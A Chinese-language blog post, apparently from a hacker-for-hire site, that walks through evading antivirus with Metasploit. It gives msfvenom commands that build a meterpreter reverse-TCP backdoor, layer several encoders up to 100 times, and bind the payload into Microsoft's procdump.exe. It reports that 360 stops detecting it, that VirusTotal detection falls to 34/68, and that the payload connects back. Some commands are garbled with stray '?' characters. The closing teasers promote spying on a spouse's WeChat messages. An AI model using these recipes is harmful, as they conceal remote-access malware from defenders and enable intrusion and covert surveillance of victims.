Metasploit免杀初探索

访客4年前关于黑客接单862

0x01 环境搭建

测试系统:windows10 (1909)

杀毒软件:360安全卫士

在线杀毒:VT

0x02 payload生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe

1599479473.png!small

原始生成后,完全被查杀

1599479482.png!small

VT查杀55/69

1599479492.png!small

0x03 编码处理

这里使用msf自带的编码器进行测试

msfvenom --list encoders 查看当前所有编码器

1599480026.png!small

这里根据级别(Rank)选择更好的(excellent)进行尝试:x86/shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129?LPORT=7777?-e x86/shikata_ga_nai -b "\x00" -i 20-f exe -o t2.exe

其中-b 特征码绕过 -i 编码次数

1599480050.png!small

1599480060.png!small

依旧被查杀

0x04 编码捆绑

测试编码并绑定微软官方工具,这里使用官方procdump做实验

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129?LPORT=7777?-e x86/shikata_ga_nai -x?procdump.exe ?-i?20?-f exe -o t3.exe

1599480071.png!small

360并未报毒,vt查杀率36/68

1599480080.png!small

0x05多重编码

通过资料了解,msfvenom某一种编码器可以做到一定程度的免杀,这是可以多重编码增大免杀率,同时x86/shikata_ga_nai为多态编码,可以尝试增大编码次数达到免杀效果

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 100?LHOST=192.168.56.129?LPORT=7777?-f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 100?-f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 100?-f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 100?-x procdump.exe -k -f exe >t4.exe

这里测试编码次数100,同样绑定官方工具,360查杀并未报毒

1599480090.png!small

VT在线查杀率34/68

1599480100.png!small

测试可正常上线

1599480111.png!small

相关文章

只有微信号可以恢复另一部手机的微信聊天记录

对于全世界数十亿网民们来说,2014年当真是不太平的一年。作为芸芸大众的一员,我们见证了索尼公司因为一部电影而遭到神秘朝鲜惨无人道的黑客攻击;此外一直以“安全难攻破”著称的苹果系统,也面临了iClou...

孳息是什么意思(民法常识孳息是什么)

孳息不仅可为所有人取得,而且也可为非所有人取得。因为收益虽为所有权的一项权能,但是收益权得与所有权相分离,由非所有人享有。非所有人享有收益权时,其也就得收取孳息,而且收益权人收取孳息的权利得排斥所有人...

ps怎么打开图片

开启ps,点一下新创建,建立,点一下文档,嵌入置入目标,选择的图片,嵌入,调节尺寸和部位就可以。 知名品牌型号规格:想到GeekPro 2020 系统软件:win10 1909 64位商业版 软件版本...

网警是否可以追踪到黑客(网警报警中心电话)-手机黑客教学盗

网警是否可以追踪到黑客(网警报警中心电话)(baidusina)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、黑客业...

如何查询老公和别人的微信聊天记录(最简单有

如何查询老公和别人的微信聊天记录(最简单有效的方法分享)在一些当代的谍战片中,经常可以看到所谓的黑客高手可以轻而易举地获得别人的微信聊天记录。小编之前认为,电影始终是电影,在现实生活中,最起码我们普通...

以下哪种商品可以在天猫发布(适合天猫发布的商品类目)

以下哪种商品可以在天猫发布(适合天猫发布的商品类目)

新产品在于品类,最少卖价、一口价,是不是存有相同,是不是启用新产品,发布時间,发售等要素决策,小结为: 天猫店哪些的产品会展现天猫商城新产品标 1、产品编写公布后...